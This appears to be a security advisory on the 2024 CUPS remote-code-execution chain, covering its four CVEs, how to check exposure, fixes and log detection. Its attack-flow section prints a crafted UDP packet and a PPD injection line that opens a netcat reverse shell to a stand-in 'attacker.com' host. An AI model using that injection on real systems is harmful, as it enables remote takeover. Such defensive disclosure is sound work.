In September 2024, security researcher Simone Margaritelli (evilsocket) disclosed a chain of critical vulnerabilities in the Common Unix Printing System (CUPS) that allows unauthenticated remote code execution on Linux systems. What makes this particularly alarming: CUPS is installed by default on most Linux distributions, and the attack surface is a UDP service listening on port 631.
The Vulnerability Chain
The attack chains four separate CVEs together:
- CVE-2024-47176 — cups-browsed binds to UDP 0.0.0.0:631, trusting any incoming IPP/HTTP packet
- CVE-2024-47076 — libcupsfilters doesn’t validate returned IPP attributes
- CVE-2024-47175 — libppd doesn’t sanitize IPP attributes when writing to PPD files
- CVE-2024-47177 — cups-filters allows arbitrary command injection via
FoomaticRIPCommandLine
How the Attack Works
# Attack flow:
# 1. Attacker sends a crafted UDP packet to port 631
# 2. cups-browsed automatically connects to the attacker's malicious IPP server
# 3. Malicious server returns a crafted PPD file with injected commands
# 4. When a user prints, the injected commands execute as the lp user
# Step 1: Attacker runs a malicious IPP server (proof-of-concept):
# The PoC (available on GitHub) sends:
# PACKET to target:631/udp:
# "0 3 http://attacker.com:12345/printers/fake-printer"
# Step 2: cups-browsed automatically fetches:
# GET http://attacker.com:12345/printers/fake-printer.ppd
# The PPD contains:
# *cupsFilter: "application/vnd.cups-simple 0 attacker-script"
# *FoomaticRIPCommandLine: "id; nc attacker.com 9999 -e /bin/sh"
# Step 3: User triggers print -> RCE as lp userCheck If You Are Vulnerable
# Check if cups-browsed is running:
sudo systemctl status cups-browsed
ps aux | grep cups-browsed
# Check if port 631 is exposed:
sudo ss -ulnp | grep 631
# Dangerous: output shows 0.0.0.0:631 (listening on all interfaces)
# Check installed versions:
dpkg -l | grep -E "cups|libcupsfilters|libppd"
# Vulnerable if cups-browsed < 2.0.1
# Check if exposed on network:
nmap -sU -p 631 YOUR_IPImmediate Fix
# Option 1: Disable and stop cups-browsed (recommended for servers):
sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed
# Verify:
sudo systemctl status cups-browsed
# Option 2: Block port 631 at firewall (if you need local printing):
sudo ufw deny 631
# Or with iptables:
sudo iptables -A INPUT -p udp --dport 631 -j DROP
sudo iptables -A INPUT -p tcp --dport 631 -j DROP
# Option 3: Patch (when available for your distro):
sudo apt update && sudo apt upgrade cups cups-browsed libcupsfilters1
# Ubuntu fix: cups-browsed >= 2.0.1-0ubuntu7.1
# Check patch status:
apt-cache policy cups-browsedIs Your Server Exposed to the Internet?
# Check if UDP 631 is reachable from outside:
# From external machine:
nmap -sU -p 631 YOUR_PUBLIC_IP
# Shodan query to see scale of exposure:
# Search: port:631 product:CUPS
# At time of disclosure: ~300,000 CUPS instances exposed on internet
# For corporate networks - check all Linux hosts:
nmap -sU -p 631 192.168.0.0/16 --open
# Any host showing 631/udp open needs immediate attentionDetection in Logs
# Monitor for exploitation attempts:
sudo tail -f /var/log/cups/error_log | grep -E "Add|printer|browsed"
# Look for unexpected new printers being added:
lpstat -p # List configured printers
# Unexpected printers from unknown hosts = potential exploitation attempt
# Wazuh custom rule (add to /var/ossec/etc/rules/local_rules.xml):
# <rule id="100200" level="12">
# <decoded_as>syslog</decoded_as>
# <match>cups-browsed</match>
# <match>New printer</match>
# <description>CUPS: Unexpected new printer added (possible CVE-2024-47176)</description>
# </rule>Wrap Up
The CUPS vulnerability chain is a sobering reminder that services we take for granted — like printing — can be serious attack vectors. If you're running Linux servers that don't need printing, disable cups-browsed immediately. For workstations that need local printing, patch and block port 631 at your perimeter firewall. No exceptions.